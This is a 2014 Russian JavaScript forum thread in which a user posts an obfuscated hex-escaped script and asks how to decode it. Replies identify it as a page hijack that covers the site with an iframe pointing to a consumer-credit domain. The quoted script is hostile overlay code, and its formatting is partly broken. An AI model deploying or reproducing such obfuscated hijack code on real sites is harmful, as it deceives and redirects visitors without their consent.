Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 02.05.2014, 22:18
Новичок на форуме
Отправить личное сообщение для kurok Посмотреть профиль Найти все сообщения от kurok
 
Регистрация: 02.05.2014
Сообщений: 1

Помогите расшифровать js
Здравствуйте помогите расшифровать js

var _0xf597=["\x6F\x76\x65\x72\x66\x6C\x6F\x77","\x73\x74\x79\x 6C\x65","\x62\x6F\x64\x79","\x68\x69\x64\x64\x65\x 6E","\x6E\x61\x64\x6F\x64\x6F\x6D\x65\x6E","\x72\x 65\x66\x65\x72\x72\x65\x72","\x68\x74\x74\x70\x3A\ x2F\x2F\x63\x72\x65\x64\x69\x74\x2E\x6E\x61\x64\x6 F\x64\x6F\x6D\x65\x6E\x2E\x72\x75","\x31\x20\x64\x 61\x79\x73","","\x7A\x6C\x6F\x79\x63\x6F\x6F\x6B\x 69\x65","\x70\x61\x74\x68\x3D\x2F","\x6F\x70\x65\x 72\x61","\x67\x65\x74\x53\x65\x6C\x65\x63\x74\x69\ x6F\x6E","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71 \x75\x65\x73\x74","\x3C\x64\x69\x76\x20\x69\x64\x3 D\x22\x73\x6C\x61\x73\x68\x70\x61\x67\x65\x22\x20\ x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x6 9\x6F\x6E\x3A\x20\x61\x62\x73\x6F\x6C\x75\x74\x65\ x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x31\x3 0\x30\x30\x30\x30\x30\x30\x30\x30\x3B\x20\x63\x6F\ x6C\x6F\x72\x3A\x20\x77\x68\x69\x74\x65\x3B\x20\x6 2\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\ x6C\x6F\x72\x3A\x77\x68\x69\x74\x65\x22\x3E","\x77 \x72\x69\x74\x65","\x3C\x69\x66\x72\x61\x6D\x65\x2 0\x6E\x61\x6D\x65\x3D\x22\x7A\x6C\x6F\x79\x2D\x69\ x66\x72\x61\x6D\x65\x22\x20\x73\x72\x63\x3D\x22\x6 1\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B\x22\x20\ x73\x74\x79\x6C\x65\x3D\x22\x6D\x61\x72\x67\x69\x6 E\x3A\x30\x3B\x20\x70\x61\x64\x64\x69\x6E\x67\x3A\ x30\x3B\x20\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x2 5\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x31\x30\ x30\x25\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3 E","\x3C\x62\x72\x20\x2F\x3E\x20\x3C\x2F\x64\x69\x 76\x3E","\x7A\x6C\x6F\x79\x72\x65\x66","\x73\x6C\x 61\x73\x68\x70\x61\x67\x65","\x67\x65\x74\x45\x6C\ x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x70\x6C \x61\x73\x68\x69\x66\x72\x61\x6D\x65\x72\x65\x66", "\x7A\x6C\x6F\x79\x2D\x69\x66\x72\x61\x6D\x65","\x 66\x72\x61\x6D\x65\x73","\x7A\x6C\x6F\x79\x75\x72\ x6C","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\ x61\x74\x69\x6F\x6E","\x73\x74\x61\x6E\x64\x61\x72 \x64\x62\x6F\x64\x79","\x63\x6F\x6D\x70\x61\x74\x4 D\x6F\x64\x65","\x43\x53\x53\x31\x43\x6F\x6D\x70\x 61\x74","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\ x65\x6D\x65\x6E\x74","\x75\x73\x65\x72\x41\x67\x65 \x6E\x74","\x74\x65\x73\x74","\x6C\x65\x66\x74","\ x74\x6F\x70","\x77\x69\x64\x74\x68","\x31\x30\x30\ x25","\x68\x65\x69\x67\x68\x74","\x6D\x6F\x76\x65\ x75\x70\x74\x69\x6D\x65\x72","\x64\x69\x73\x70\x6C \x61\x79","\x6E\x6F\x6E\x65","\x61\x62\x6F\x75\x74 \x3A\x62\x6C\x61\x6E\x6B","\x61\x75\x74\x6F","\x65 \x6E\x61\x62\x6C\x65\x66\x72\x65\x71\x75\x65\x6E\x 63\x79","\x64\x69\x73\x70\x6C\x61\x79\x66\x72\x65\ x71\x75\x65\x6E\x63\x79","\x63\x6F\x6F\x6B\x69\x65 \x6E\x61\x6D\x65","\x5F\x73","\x67\x65\x74\x43\x6F \x6F\x6B\x69\x65","\x6C\x6F\x61\x64\x65\x64","\x73 \x65\x74\x43\x6F\x6F\x6B\x69\x65","\x6C\x61\x75\x6 E\x63\x68","\x6F\x75\x74\x70\x75\x74","\x61\x75\x7 4\x6F\x68\x69\x64\x65\x74\x69\x6D\x65\x72","\x7A\x 6C\x6F\x79\x2E\x63\x6C\x6F\x73\x65\x69\x74\x28\x29 ","\x3D\x5B\x5E\x3B\x5D\x2B","\x69","\x6D\x61\x74\ x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x73\x 70\x6C\x69\x74","\x75\x6E\x64\x65\x66\x69\x6E\x65\ x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\ x44\x61\x74\x65","\x3B\x20\x65\x78\x70\x69\x72\x65 \x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6 E\x67","\x3B\x20","\x62\x72\x6F\x77\x73\x65\x72\x6 4\x65\x74\x65\x63\x74\x73\x74\x72","\x73\x70\x6C\x 61\x73\x68\x65\x6E\x61\x62\x6C\x65\x64","\x69\x6E\ x69\x74"];document[_0xf597[2]][_0xf597[1]][_0xf597[0]]=_0xf597[3];PS=17;yandex=_0xf597[4];var r=document[_0xf597[5]];var zloy={splashenabled:1,zloyurl:_0xf597[6],enablefrequency:0,displayfrequency:_0xf597[7],defineheader:_0xf597[8],cookiename:[_0xf597[9],_0xf597[10]],autohidetimer:0,launch:false,browserdetectstrwi ndow[_0xf597[11]]&&window[_0xf597[12]])||(!window[_0xf597[11]]&&window[_0xf597[13]]),output:function (){document[_0xf597[15]](_0xf597[14]);document[_0xf597[15]](_0xf597[16]);document[_0xf597[15]](_0xf597[17]);this[_0xf597[18]]=document[_0xf597[20]](_0xf597[19]);this[_0xf597[21]]=window[_0xf597[23]][_0xf597[22]];this[_0xf597[21]][_0xf597[26]][_0xf597[25]](this[_0xf597[24]]);this[_0xf597[27]]=(document[_0xf597[28]]==_0xf597[29])?document[_0xf597[30]]:document[_0xf597[2]];if(!/safari/i[_0xf597[32]](navigator[_0xf597[31]])){this[_0xf597[27]][_0xf597[1]][_0xf597[0]]=_0xf597[3];} ;this[_0xf597[18]][_0xf597[1]][_0xf597[33]]=0;this[_0xf597[18]][_0xf597[1]][_0xf597[34]]=0;this[_0xf597[18]][_0xf597[1]][_0xf597[35]]=_0xf597[36];this[_0xf597[18]][_0xf597[1]][_0xf597[37]]=_0xf597[36];} ,closeit:function (){clearInterval(this[_0xf597[38]]);this[_0xf597[18]][_0xf597[1]][_0xf597[39]]=_0xf597[40];this[_0xf597[21]][_0xf597[26]][_0xf597[25]](_0xf597[41]);this[_0xf597[27]][_0xf597[1]][_0xf597[0]]=_0xf597[42];} ,init:function (){if(this[_0xf597[43]]==1){if(/sessiononly/i[_0xf597[32]](this[_0xf597[44]])){if(this[_0xf597[47]](this[_0xf597[45]][0]+_0xf597[46])==null){this[_0xf597[49]](this[_0xf597[45]][0]+_0xf597[46],_0xf597[48]);this[_0xf597[50]]=true;} ;} else {if(/day/i[_0xf597[32]](this[_0xf597[44]])){if(this[_0xf597[47]](this[_0xf597[45]][0])==null||parseInt(this[_0xf597[47]](this[_0xf597[45]][0]))!=parseInt(this[_0xf597[44]])){this[_0xf597[49]](this[_0xf597[45]][0],parseInt(this[_0xf597[44]]),parseInt(this[_0xf597[44]]));this[_0xf597[50]]=true;} ;} ;} ;} else {this[_0xf597[50]]=true;} ;if(this[_0xf597[50]]){this[_0xf597[51]]();if(parseInt(this[_0xf597[52]])>0){setTimeout(_0xf597[53],parseInt(this[_0xf597[52]])*1000);} ;} ;} ,getCookie:function (_0xa6c7x3){var _0xa6c7x4= new RegExp(_0xa6c7x3+_0xf597[54],_0xf597[55]);if(document[_0xf597[57]][_0xf597[56]](_0xa6c7x4)){return document[_0xf597[57]][_0xf597[56]](_0xa6c7x4)[0][_0xf597[59]](_0xf597[58])[1];} ;return null;} ,setCookie:function (_0xa6c7x5,_0xa6c7x6,_0xa6c7x7){var _0xa6c7x8= new Date();if( typeof _0xa6c7x7!=_0xf597[60]){var _0xa6c7x9=_0xa6c7x8[_0xf597[62]](_0xa6c7x8[_0xf597[61]]()+parseInt(_0xa6c7x7));document[_0xf597[57]]=_0xa6c7x5+_0xf597[58]+_0xa6c7x6+_0xf597[63]+_0xa6c7x8[_0xf597[64]]()+_0xf597[65]+zloy[_0xf597[45]][1];} else {document[_0xf597[57]]=_0xa6c7x5+_0xf597[58]+_0xa6c7x6+_0xf597[65]+zloy[_0xf597[45]][1];} ;} };if(zloy[_0xf597[66]]&&zloy[_0xf597[67]]==1){zloy[_0xf597[68]]();} ;

Последний раз редактировалось kurok, 02.05.2014 в 22:31.
Ответить с цитированием
  #2 (permalink)  
Старый 04.05.2014, 00:06
Интересующийся
Отправить личное сообщение для pavelrer Посмотреть профиль Найти все сообщения от pavelrer
 
Регистрация: 03.05.2014
Сообщений: 26

http://ddecode.com/phpdecoder/
Ответить с цитированием
  #3 (permalink)  
Старый 06.05.2014, 16:06
Аватар для MallSerg
Профессор
Отправить личное сообщение для MallSerg Посмотреть профиль Найти все сообщения от MallSerg
 
Регистрация: 07.03.2011
Сообщений: 1,127

Это скрипт который редиректит страницу на сайт где впаривают потребительские кредиты.
Приведенный код не валидный и расшифровке почти не поддается =)
Ответить с цитированием
  #4 (permalink)  
Старый 06.05.2014, 17:22
Аватар для рони
Профессор
Отправить личное сообщение для рони Посмотреть профиль Найти все сообщения от рони
 
Регистрация: 27.05.2010
Сообщений: 33,068

MallSerg,
код валидный -- но отформатирован как текст
kurok,
не знает о кнопке
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите расшифровать JS pavdin Общие вопросы Javascript 24 01.04.2017 20:37
Помогите расшифровать Hattake Общие вопросы Javascript 5 29.04.2014 00:52
помогите со скриптом js nexio Учебные материалы 6 26.11.2013 12:27
Помогите разобраться ... Я новенький в JS ... bogong Общие вопросы Javascript 23 27.12.2011 19:20
помогите со js скриптом поиска по текстовой базе MorganStels Ваши сайты и скрипты 4 15.06.2010 10:03